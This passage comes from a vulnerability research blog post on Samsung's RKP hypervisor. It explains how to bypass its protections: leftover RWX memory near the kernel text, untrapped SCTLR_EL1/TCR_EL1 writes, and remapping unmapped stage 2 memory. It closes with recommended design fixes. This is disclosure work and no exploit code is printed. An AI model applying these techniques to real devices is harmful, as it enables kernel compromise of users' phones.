   if (etext & 0x1FFFFF)
       rkp_debug_log("Kernel range is not aligned", 0, 0, 0);

   if (!rkp_s2_range_change_permission(kern_text_phys_start, kern_text_phys_end, 128, 1, 1))
       rkp_debug_log("Failed to make Kernel range RO", 0, 0, 0);

   ...
}
The highlighted function call above is used in order to modify the stage 2 access permissions for a given PA memory range. Calling the function with these arguments will cause the given memory range to be marked as read-only in the stage 2 translation. This means that shortly after booting the EL1 kernel, RKP does indeed lock down write access to the kernel’s code ranges.
...And yet, something’s still missing here. Remember that RKP should not only prevent the kernel’s code from being modified, but it aims to also prevent attackers from creating new executable code in EL1. Well, while the kernel’s code is indeed being marked as read-only in the stage 2 translation table, does that necessarily prevent us from creating new executable code?
Recall that we’ve previously encountered the presence of KASLR, in which the kernel’s base address (both in the kernel’s VAS and the corresponding physical address) is shifted by a randomised “slide” value. Moreover, since the Linux kernel assumes that the virtual to physical offset for kernel addresses is constant, this means that the same slide value is used for both virtual and physical addresses.
However, there’s a tiny snag here -- the address range we examined earlier on, the same one which is marked RWX is both the stage 1 and stage 2 translation table, is much larger than the kernel’s text segment. This is, partly, in order to allow the kernel to be placed somewhere within that region after the KASLR slide is determined. However, as we’ve just seen, after choosing the KASLR slide, RKP only protects the range spanning from “_text” to “_etext” - that is, only the region containing the kernel’s text after applying the KASLR slide.

This leaves us with two large regions: [0x80000000, “_text”], [“_etext”, 0x81400000], which are left marked as RWX in both the stage 1 and stage 2 translation tables! Thus, we can simply write new code to these regions and execute it freely within the context of EL1, therefore bypassing the code loading mitigation. I’ve included a small PoC which demonstrates this issue, here.
Mitigation #3 - Bypassing EL1 Memory Controls
As we’ve just seen in the previous section, some of RKP’s stated goals require memory controls that are enforced not only in the stage 2 translation, but also directly in the stage 1 translation used by EL1. For example, RKP aims to ensure that all pages, with the exception of the kernel’s code, are marked as PXN. These goals require RKP to have some form of control over the contents of the stage 1 translation table.
So how exactly does RKP make sure that these kinds of assurances are kept? This is done by using a combined approach; first, the stage 1 translation tables are placed in a region which is marked as read-only in the stage 2 translation tables. This, in effect, disallows EL1 code from directly modifying the translation tables themselves. Secondly, the kernel is instrumented (a form of paravirtualisation), in order to make it aware of RKP’s existence. This instrumentation is performed so that each write operation to a data structure used in the stage 1 translation process (a PGD, PMD or PTE), will instead call an RKP command, informing it of the requested change.
Putting these two defences together, we arrive at the conclusion that all modifications to the stage 1 translation table must therefore pass through RKP which can, in turn, ensure that they do not violate any of its security goals.
Or do they?
While these rules do prevent modification of the current contents of the stage 1 translation table, they don’t prevent an attacker from using the memory management control registers to circumvent these protections. For example, an attacker could attempt to modify the value of TTBR1_EL1 directly, pointing it at an arbitrary (and unprotected) memory address.
Obviously, such operations cannot be permitted by RKP. In order to allow the hypervisor to deal with such situations, the “Hypervisor Configuration Register” (HCR) can be leveraged. Recall that the HCR allows the hypervisor to disallow certain operations from being performed under EL1. One such operation which can be trapped is the modification of the EL1 memory management control registers.

In the case of RKP on Exynos devices, while it does not set HCR_EL2.TRVM (i.e., it allows all read access to memory control registers), it does indeed set HCR_EL2.TVM, allowing it to trap write access to these registers.
So although we’ve established that RKP does correctly trap write access to the control registers, this still doesn’t guarantee they remain protected. This is actually quite a delicate situation - the Linux kernel requires some access to many of these registers in order to perform regular operations. This means that while some access can be denied by RKP, other operations need to be inspected carefully in order to make sure they do not violate RKP’s safety guarantees, before allowing them to proceed. Once again, we’ll need to reverse engineer RKP’s code to assess the situation.

As we can see above, attempts to modify the location of the translation tables themselves, result in RKP correctly verifying the entire translation table, making sure it follows the allowed stage 1 translation policy. In contrast, there are a couple of crucial memory control registers which, at the time, weren’t intercepted by RKP at all - TCR_EL1 and SCTLR_EL1!
Inspecting these registers in the ARM reference manual reveals that they both can have profound effects on the stage 1 translation process.
For starters, the System Control Register for EL1 (SCTLR_EL1) provides top-level control over the system, including the memory system, in EL1. One bit of crucial importance in our scenario is the SCTLR_EL1.M bit.

This bit denotes the state of the MMU for stage 1 translation in EL0 and EL1. Therefore, simply by unsetting this bit, an attacker can disable the MMU for stage 1 translation. Once the bit is unset, all memory translation in EL1 map directly to IPAs, but more importantly - these memory translation do not have any access permissions checks enabled, effectively making all memory ranges considered as RWX in the stage 1 translation. This, in turn, bypasses several of RKP’s assurances, such as making sure that only the kernel’s text is not marked as PXN.
As for the Translation Control Register for EL1 (TCR_EL1), it’s effects are slightly more subtle. Instead of completely disabling the stage 1 translation’s MMU, this register governs the way in which translation is performed.

Indeed, observing this register more closely, reveals certain key ways in which an attacker may leverage it in order to circumvent RKP’s stage 1 protections. For example, the AARCH64 memory translation table may assume different formats, depending on the translation granule under which the system is operating. Normally, AARCH64 Linux kernels use a translation granule of 4KB.
This fact is implicitly acknowledged in RKP. For example, when code in EL1 changes the value of the translation table (e.g., TTBR1_EL1), RKP must protect this PGD in the stage 2 translation in order to make sure that EL1 cannot gain access to it. Indeed, reversing the corresponding code within RKP reveals that it does just that:

However, as we can see in the picture above, the stage 2 protection is only performed on a 4KB region (a single page). This is because when using a 4KB translation granule, the translation regime has a translation table size of 4KB. However, this is where we, as an attacker, come in. What if we were to change the value of the translation granule to 64KB, by modifying TCR_EL1.TG0 and TCR_EL1.TG1?

In that case, the translation regime’s translation table will now be 64KB as well, as opposed to 4KB under the previous regime. Since RKP uses a hard-coded value of 4KB when protecting the translation table, the bottom 60KB remain unprotected by RKP, allowing an attacker in EL1 to freely modify it in order to point to any IPA, any more crucially, with any access permissions, UXN/PXN values.

Lastly, it should once more be noted that while the gadgets needed to access these registers aren’t abundant in the kernel’s image, they are present in the embedded RKP binary on Exynos devices. Therefore we can simply execute these gadgets within EL1 in order to modify the registers above. I’ve written a small PoC that demonstrates this issue by disabling the stage 1 MMU in EL1.
Mitigation #4 - Accessing Stage 2 Unmapped Memory
Other than the operating system’s memory, there exist several other memory regions which may contain potentially sensitive information that should not be accessible by code running in EL0 and EL1. For example, peripherals on the SoC may have their firmware stored in the “Normal World”, in physical memory ranges which should never be accessible to Android itself.
In order to enforce such protections, RKP explicitly unmaps a few memory ranges from the stage 2 translation table. By doing so, any attempt to access these PA ranges in EL0 or EL1 will result in a translation fault, consequently crashing the kernel and rebooting the device.
Moreover, RKP’s own memory ranges should also be made inaccessible to lesser privileged code. This is crucial so as to protect RKP from modifications by EL0 and EL1, but also serves to protect the sensitive information that is processed within RKP (such as the “cfprop” key). Indeed, after starting up, RKP explicitly unmaps it’s own memory ranges in order to prevent such access:

Admittedly, the stage 2 translation table itself is placed within the very region being unmapped from the stage 2 translation table, therefore ensuring that code in EL1 cannot modify it. However, perhaps we could find another way to control stage 2 mappings, but leveraging RKP itself.
For example, as we’ve previously seen, certain operations such as setting TTBR1_EL1 result in changes to the stage 2 translation table. Combing over the RKP binary, we come across one such operation, as follows:
__int64 rkp_set_init_page_ro(unsigned args* args_buffer)
{
 unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
 if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
 {
   if ( !rkp_s2_page_change_permission(page_pa, 128, 0, 0) )
     return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
 }
 else
 {
   rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
 }
 rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
 return rkp_set_pgt_bitmap(page_pa, 0);
}
As we can see, this command receives a pointer from EL1, verifies it is not within the kernel’s text segment, and if so proceeds to call rkp_s2_page_change_permission in order to modify the access permissions on this range in the stage 2 translation table. Digging deeper into the function reveals that this set of parameters is used to denote the region as read-only and XN.
But, what if we were to supply a page that resides somewhere that is not currently mapped in the stage 2 translation at all, such as RKP’s own memory ranges? Well, in this case, rkp_s2_page_change_permission will happily create a translation entry for the given page, effectively mapping in a previously unmapped region!
This allows us to re-map any stage 2 unmapped region (albeit as read-only and XN) from EL1. I’ve written a small PoC which demonstrates the issue by stage 2 re-mapping RKP’s physical address range and reading it from EL1.Design Improvements to RKP
After seeing some specific issues in this blog post, highlighting how the different defence mechanisms of RKP could be subverted by an attacker, let’s zoom out for a second and think about some design choices that could serve to strengthen RKP’s security posture against future attacks.
First, RKP on Exynos devices is currently being bootstrapped by EL1 code. This is in contrast to the model used on Qualcomm devices, whereby the EL2 code is both verified by the bootloader, and subsequently booted by EL3. Ideally, I believe the same model used on Qualcomm devices should be adopted for Exynos as well.
Performing the bootstrapping in this order automatically fixes other related security issues “for free”, such as the presence of RKP’s binary within the kernel’s text segment. As we’ve seen, this seemingly harmless fact is in fact very useful for an attacker in several of the scenarios we’ve highlighted in this post. Moreover, it removes other risks such as attackers exploiting the EL1 kernel early in the boot process and leveraging that access to subvert the initialisation of EL2.
As in interim improvement, RKP decided to zero out the RKP binary resident in EL1’s code during initialisation. This improvement will roll out in the next Nougat milestone release of Samsung devices, and addresses the issue of attackers leveraging the binary for gadgets. However, it doesn’t address the issue regarding potential early exploitation of the EL1 kernel to subvert the initialization of EL2, which requires a more extensive modification.
Second, RKP’s code segments are currently marked as both writable and executable in TTBR0_EL2. This, combined with the fact that SCTLR_EL2.WXN is not set, allows an attacker to use any memory corruption primitive in EL2 in order to directly overwrite the EL2 code segments, allowing for much easier exploitation of the hypervisor.
While I have not chosen to include these issues in the blog post, I’ve found several memory corruptions, any of which could be used to modify memory within the context of RKP. Combining these two facts together, we can conclude that any of these memory corruptions could be used by an attacker to directly modify RKP’s code itself, therefore gaining code execution within it.
Simply setting SCTLR_EL2.WXN and marking RKP’s code as read-only would not prevent an attacker from gaining access to RKP, but it could make exploitation of such memory corruptions harder to exploit and more time consuming.
Third, RKP should lock down all memory control registers, unless they absolutely must be used by the Linux kernel. This would prevent abuse of several of these registers which may subtly affect the system’s behaviour, and in doing so, violate assumptions made by RKP about the kernel. Where these registers have to be modified by EL1, RKP should verify that only the appropriate bits are accessed.
RKP has since locked down access to the two registers mentioned in this blog post. This is a good step in the right direction, and unfortunately as access to some of these registers must be retained, simply revoking access to all of them is not a feasible solution. As such, preventing access to other memory control registers remains a long term goal.
Lastly, there should be some distinction between stage 2 unmapped regions that were simply never mapped in, and those which were explicitly mapped out. This can be achieved by storing the memory ranges corresponding to explicitly unmapped regions, and disallowing any modification that would result in remapping them within RKP. While the issue I highlighted is now fixed, implementing this extra step would prevent further similar issues from cropping up in the future.
Categories: Security